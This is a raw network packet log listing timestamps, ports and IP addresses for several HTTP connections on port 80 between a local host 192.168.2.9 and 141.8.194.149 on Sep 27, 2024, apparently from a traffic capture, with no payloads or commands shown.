                                  Sep 27, 2024 08:42:44.987858057 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987874985 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987891912 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987894058 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987894058 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987920046 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987937927 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987941027 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987962008 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.988008976 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.988024950 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.988042116 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.988054991 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.988095045 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.990245104 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.994997025 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228665113 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228874922 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228943110 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228995085 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229034901 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229038000 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229078054 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229142904 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229147911 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229182959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229216099 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229223013 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229255915 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229298115 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229321957 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229337931 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229340076 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229352951 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229367971 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229384899 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229401112 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229418039 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229437113 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229454994 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229470968 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229485989 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229506016 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229557037 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229701996 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229723930 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229739904 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229779005 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229793072 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229804039 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229804039 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229809046 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229825020 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229888916 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229888916 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230246067 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230264902 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230281115 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230307102 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230334044 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230349064 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230364084 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230380058 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230391979 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230429888 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230437040 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230448008 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230467081 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230477095 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230484962 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230504036 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230530977 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230556011 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.231239080 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231254101 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231270075 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231303930 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.231329918 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231347084 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231363058 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.231414080 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.231414080 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.232938051 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.460002899 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.464932919 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:56.465039015 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.465290070 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:56.470086098 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134569883 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134592056 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134618998 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134629965 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134633064 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134641886 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134654045 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134665012 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134673119 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134675980 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134686947 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134697914 CEST8049716141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:57.134716988 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134716988 CEST4971680192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:57.134737015 CEST4971680192.168.2.9141.8.194.149
Sep 27, 2024 08:42:57.140736103 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.140750885 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.140762091 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.140836954 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.248677969 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248697042 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248707056 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248718977 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248778105 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.248805046 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248869896 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248884916 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248895884 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248905897 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.248919964 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.248945951 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.249841928 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.249861002 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.249872923 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.249882936 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.249886990 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.249893904 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.249905109 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.249929905 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.250665903 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.250677109 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.250689030 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.250720024 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.251174927 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.251211882 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.251235962 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.251271963 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.251281977 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.251305103 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.251322985 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.251343012 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.251971960 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.253587961 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.253598928 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.253637075 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.363081932 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363101006 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363133907 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363145113 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363172054 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363177061 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.363184929 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363197088 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363202095 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.363209009 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363220930 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363230944 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363241911 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363256931 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.363276958 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.363711119 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363748074 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.363795996 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.454768896 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.459845066 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.665817022 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.665863037 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.665915966 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.665966034 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666058064 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666107893 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666110992 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666140079 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666182041 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666182995 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666199923 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666214943 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666229010 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666244030 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666249037 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666259050 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666273117 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666274071 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666289091 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666301966 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666305065 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666318893 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666327000 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666333914 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666347980 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666363001 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666363001 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666377068 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666606903 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666618109 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666627884 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666661024 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666691065 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666702986 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666728973 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666738987 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666749001 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666755915 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666759968 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.666770935 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.666814089 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667313099 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667325974 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667336941 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667346954 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667361021 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667395115 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667557955 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667603016 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667613029 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667645931 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667684078 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667694092 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667704105 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667714119 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667732954 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667749882 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667756081 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667766094 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667776108 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667788029 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.667797089 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.667826891 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.668652058 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.668664932 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.668677092 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.668688059 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.668700933 CEST    80    49716    141.8.194.149    192.168.2.9
Sep 27, 2024 08:42:57.668741941 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.668764114 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:42:57.690952063 CEST    49716    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:20.926114082 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:20.931121111 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:20.931212902 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:20.931432962 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:20.936211109 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620825052 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620845079 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620876074 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620887041 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620907068 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620920897 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620933056 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620943069 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620954037 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.620954990 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.620970964 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.621126890 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.625768900 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.625782013 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.625880003 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.735604048 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.735619068 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.735627890 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.735831022 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.735841036 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.735851049 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.735865116 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.735891104 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.735899925 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.736211061 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.736242056 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.736253023 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.736283064 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.736329079 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.736340046 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.736386061 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.737019062 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737072945 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.737076998 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737109900 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737121105 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737131119 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737150908 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.737170935 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.737960100 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737970114 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.737981081 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.738013029 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.738071918 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.738085985 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.738122940 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.738785982 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.738835096 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.753895998 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.753906012 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.754019022 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.826337099 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.826349020 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.826359034 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.826473951 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.850661993 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850692987 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850708961 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850719929 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850729942 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850739956 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850790977 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850800991 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850811005 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.850827932 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.850827932 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.850869894 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.850869894 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.851524115 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.851567984 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.851581097 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:21.851612091 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.854018927 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:21.858808994 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065361023 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065407991 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065466881 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.065561056 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065593004 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065606117 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065640926 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.065651894 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065670967 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.065725088 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.066025972 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066054106 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066065073 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066076040 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066082001 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.066091061 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066109896 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.066128969 CEST    49718    80    192.168.2.9    141.8.194.149
